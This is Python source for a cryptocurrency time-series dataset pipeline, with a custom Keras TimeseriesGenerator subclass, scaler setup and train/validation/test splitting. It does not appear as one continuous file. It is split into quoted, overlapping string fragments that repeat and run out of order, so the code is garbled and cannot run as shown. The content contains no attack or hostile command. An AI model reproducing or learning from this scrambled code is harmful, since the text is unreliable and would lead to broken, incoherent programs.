"self.x_Test = None self.y_Test = None self.features_scaler = object self.targets_scaler = object self.train_gen",
"= f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator):",
"configuration we are using DSConstants dataclass (profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile:",
"= start_index + length self.overlap = overlap if end_index is None: end_index =",
"datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour =",
"tensorflow as tf from dataclasses import dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures",
"self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self): index = 0 i = (self.start_index",
"TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data,",
"self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len +",
"if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg =",
"disallowed') if overlap > 0: start_index += overlap self.data = data self.targets =",
"x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0]",
"preparation type\" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler ==",
"sys import time import copy import pytz import numpy as np import datetime",
"Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr =",
"x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return",
"y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:,",
"df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate,",
"self.end_index + 1), self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row",
"rows]) # self.sample_shape = samples.shape targets = np.array([self.targets[row] for row in rows]) if",
"def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128):",
"to be' + ' of same length. ' 'Data length is {}'.format(len(data)) +",
"= None self.y_Test = None self.features_scaler = object self.targets_scaler = object self.train_gen =",
"batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size) if len(data)",
"else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\"",
"memory Args: loader (DataLoad): object with data Returns: DSCreator (class): object \"\"\" self.features",
"data (symbols and timeframes). All data with chosen period loaded to memory Args:",
"= x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :]",
"self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape",
"self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile()",
"timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', )",
"super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size) if len(data) !=",
"df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) -",
"== \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg",
"type\" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr)",
"is None: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data",
"x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data)",
"= TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self,",
"\"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data,",
"y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen",
"to memory Args: loader (DataLoad): object with data Returns: DSCreator (class): object \"\"\"",
"df_train_len, df_val_len, None else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows -",
"self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len, df_test_len def",
"self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\":",
"os import sys import time import copy import pytz import numpy as np",
"= int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len",
"+ 1), self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in",
"None): return self.x_Val, self.y_Val def get_test(self): if (self.x_Test is not None) and (self.y_Test",
"solid data \"\"\" self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data)",
"DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone /",
"elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data ==",
"np.arange(i, min(i + self.batch_size * self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row",
"batch_size=x_arr.shape[0] ) for x_data, y_data in gen: continue return x_data, y_data def save_dataset_arrays(self,",
"= None pass def get_train(self): if (self.x_Train is not None) and (self.y_Train is",
"check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler ==",
"tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt import seaborn as sns import tensorflow",
"DSCreator (class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet()",
"left to be used as current step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape()",
"= self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler =",
"self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler =",
"targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length,",
"analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name():",
"OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt",
"and (self.y_Test is not None): return self.x_Test, self.y_Test class DSCreator: \"\"\" Class for",
"length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen",
"= x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len +",
"self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index):",
"self.sample_shape = self.calc_shape() pass def calc_shape(self): index = 0 i = (self.start_index +",
"self.x_Val, self.y_Val def get_test(self): if (self.x_Test is not None) and (self.y_Test is not",
"self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len,",
"overlap > 0: start_index += overlap self.data = data self.targets = targets self.length",
"object self.targets_scaler = object self.train_gen = None self.val_gen = None self.test_gen = None",
"= np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else: i = (self.start_index + self.batch_size",
"df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return",
"test_len = self.split_data_df() if test_len is None: x_Train_data = x_arr[train_len:, :] x_Val_data =",
"matplotlib.pyplot as plt import seaborn as sns import tensorflow as tf from dataclasses",
"self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def",
"y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen",
"self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset",
"ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap > 0: start_index += overlap self.data",
"return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler =",
"= None else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr =",
"Use from this datetimeindex end_period = None -> Use until [:-1] of historical",
"raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap > 0: start_index += overlap",
"' of same length. ' 'Data length is {}'.format(len(data)) + ' while target",
"np import datetime import pandas as pd from typing import Tuple from sklearn.preprocessing",
"import MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import",
"get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, )",
"= self.split_data_df() if test_len is None: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len",
"targets have to be' + ' of same length. ' 'Data length is",
"None): return self.x_Train, self.y_Train def get_val(self): if (self.x_Val is not None) and (self.y_Val",
"self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler",
"= x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len +",
"as plt import seaborn as sns import tensorflow as tf from dataclasses import",
"= '2021-12-05 23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\" -> Use this directory",
"until this datetimeindex source_directory=\"../source_root\" -> Use this directory to search timeframes directory \"\"\"",
"source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc = DSCreator(loaded_crypto_data, dataset_1_profile)",
"load start_period = None -> Use from [0:] of historical data start_period =",
"dataset configuration we are using DSConstants dataclass (profile) \"\"\" def __init__(self, loader: DataLoad,",
"of historical data start_period = '2021-09-01 00:00:00' -> Use from this datetimeindex end_period",
">= length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap > 0: start_index",
"\"ETHUSDT\") -> Use only this pairs to load time_intervals = None -> Use",
"\"close1-close2\": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return",
"'would be left to be used as current step.' % (self.start_index, self.end_index)) self.sample_shape",
"length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen",
"TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in",
"None self.input_shape = None pass def get_train(self): if (self.x_Train is not None) and",
"self.y_Val = None self.x_Test = None self.y_Test = None self.features_scaler = object self.targets_scaler",
"for DataLoad class ------------------------ pairs_symbol = None -> Use all pairs in timeframe",
"None self.y_df = None self.x_Train = None self.y_Train = None self.x_Val = None",
"target length is {}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}` is",
"y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) ->",
"\"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler == \"robust\":",
"int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len +",
"class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False,",
"targets @dataclass class DataSet: def __init__(self): self.name: str = '' self.dataset_profile = DSProfile()",
"None: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data =",
"Use all timeframes directories for loading (with pairs_symbols) time_intervals = ['15m'] -> Use",
"self.y_Train def get_val(self): if (self.x_Val is not None) and (self.y_Val is not None):",
"self.dataset.features_scaler.transform(self.dataset.features_df.values) \"\"\" check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr,",
"import RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import",
"f\"{offset_hour:.0f}\" if offset_hour > 0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def",
"import matplotlib.pyplot as plt import seaborn as sns import tensorflow as tf from",
"FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt import seaborn as sns",
"from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer from",
"time import copy import pytz import numpy as np import datetime import pandas",
"= TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self,",
"self.dataset.targets_scaler = None else: msg = \"Error: Unknown scaler preparation type\" sys.exit(msg) x_arr",
"0.0010 def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone / 3600 else: offset_hour =",
"self.calc_shape() pass def calc_shape(self): index = 0 i = (self.start_index + self.batch_size *",
"this directory to search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01",
"self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape",
"with data Returns: DSCreator (class): object \"\"\" self.features = DataFeatures(loader) self.dataset_profile = dataset_profile",
"__name__ == \"__main__\": \"\"\" Usage for DataLoad class ------------------------ pairs_symbol = None ->",
"df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride,",
"# self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self,",
"else: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes +",
"y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len = self.split_data_df() if test_len",
"TimeseriesGenerator import matplotlib.pyplot as plt import seaborn as sns import tensorflow as tf",
"sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride,",
"def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap,",
"time to have solid data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data,",
"directory to search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00',",
"period loaded to memory Args: loader (DataLoad): object with data Returns: DSCreator (class):",
"x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name",
"= x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile)",
"np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = samples.shape",
"from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from",
"search timeframes directory \"\"\" loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory=\"../source_root\", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59',",
":] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) \"\"\" Using generator 1 time to have solid",
"self.val_gen = None self.test_gen = None self.input_shape = None pass def get_train(self): if",
"is {}'.format(len(data)) + ' while target length is {}'.format(len(targets))) if overlap >= length:",
"- self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape =",
"DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len =",
"self.overlap = overlap if end_index is None: end_index = len(data) - 1 self.end_index",
"not None): return self.x_Test, self.y_Test class DSCreator: \"\"\" Class for dataset creation for",
"y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate,",
"timeframes from this list to load start_period = None -> Use from [0:]",
"LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator",
"return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend()",
"self.sample_shape = samples.shape targets = np.array([self.targets[row] for row in rows]) if self.reverse: return",
"self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as no part of the",
"for loading (with pairs_symbols) time_intervals = ['15m'] -> Use timeframes from this list",
"is not None) and (self.y_Val is not None): return self.x_Val, self.y_Val def get_test(self):",
"self.y_Val def get_test(self): if (self.x_Test is not None) and (self.y_Test is not None):",
"pairs_symbols) time_intervals = ['15m'] -> Use timeframes from this list to load start_period",
"== \"close1-close2_trend\": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df",
"MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer",
"def __init__(self): self.name: str = '' self.dataset_profile = DSProfile() self.features_df = None self.y_df",
"self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len = self.split_data_df()",
"DSConstants dataclass (profile) \"\"\" def __init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object",
"self.end_index + 1, size=self.batch_size) else: i = (self.start_index + self.batch_size * self.stride *",
"data end_period = '2021-12-05 23:59:59' -> Use until this datetimeindex source_directory=\"../source_root\" -> Use",
"y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len",
"y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen",
"loading (with pairs_symbols) time_intervals = ['15m'] -> Use timeframes from this list to",
"self.data = data self.targets = targets self.length = length self.sampling_rate = sampling_rate self.stride",
"index) rows = np.arange(i, min(i + self.batch_size * self.stride, self.end_index + 1), self.stride)",
"data \"\"\" x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train =",
"get_val(self): if (self.x_Val is not None) and (self.y_Val is not None): return self.x_Val,",
"this datetimeindex end_period = None -> Use until [:-1] of historical data end_period",
"0: offset_hour_msg = f\"+{offset_hour:.0f}\" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length,",
"self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == \"close1-close2_power\": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset",
"self.x_Val = None self.y_Val = None self.x_Test = None self.y_Test = None self.features_scaler",
"y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :] x_Val_data =",
"= self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile =",
"row in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return",
"x_data, y_data in gen: continue return x_data, y_data def save_dataset_arrays(self, path_filename): pass if",
"dataset creation for dataset configuration we are using DSConstants dataclass (profile) \"\"\" def",
"- df_test_len:, :] return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen =",
"raise ValueError('Data and targets have to be' + ' of same length. '",
"import LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import",
"numpy as np import datetime import pandas as pd from typing import Tuple",
"part of the sequence ' 'would be left to be used as current",
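As a quick sanity check on the generator above, here is a minimal sketch of the window/target alignment it produces. The synthetic data, window length, and batch size are all illustrative, and the snippet assumes the reconstructed TSDataGenerator in this module.

import numpy as np

data = np.arange(100, dtype=np.float32).reshape(-1, 1)     # 100 timesteps, 1 feature
targets = np.arange(100, dtype=np.float32).reshape(-1, 1)

gen = TSDataGenerator(data=data, targets=targets,
                      length=10,        # each sample is a 10-step window
                      sampling_rate=1,
                      stride=1,
                      batch_size=4,
                      overlap=0)

x_batch, y_batch = gen[0]
print(x_batch.shape)  # (4, 10, 1): four windows of ten steps, one feature
print(y_batch.shape)  # (4, 1): one target per window, taken at the step after it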
"else: i = (self.start_index + self.batch_size * self.stride * index) rows = np.arange(i,",
"self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as no part",
"offset_hour = time.altzone / 3600 else: offset_hour = time.timezone / 3600 offset_hour_msg =",
"> 0: start_index += overlap self.data = data self.targets = targets self.length =",
"DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len",
"self.split_data_df() if test_len is None: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len +",
"1) if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg",
"check \"\"\" y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler ==",
"import dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__ =",
"x_arr, y_arr): train_len, val_len, test_len = self.split_data_df() if test_len is None: x_Train_data =",
"self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == \"power_trend\": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight)",
"shuffle, reverse, batch_size) if len(data) != len(targets): raise ValueError('Data and targets have to",
"'2021-09-01 00:00:00' -> Use from this datetimeindex end_period = None -> Use until",
"[:-1] of historical data end_period = '2021-12-05 23:59:59' -> Use until this datetimeindex",
"from analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010 def",
"pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name =",
"= samples.shape targets = np.array([self.targets[row] for row in rows]) if self.reverse: return samples[:,",
"-> Use only this pairs to load time_intervals = None -> Use all",
"__init__(self, loader: DataLoad, dataset_profile: DSProfile): \"\"\" Getting object with OHLCV data (symbols and",
"df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index,",
"pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == \"robust\": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None",
"self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len",
"= None self.input_shape = None pass def get_train(self): if (self.x_Train is not None)",
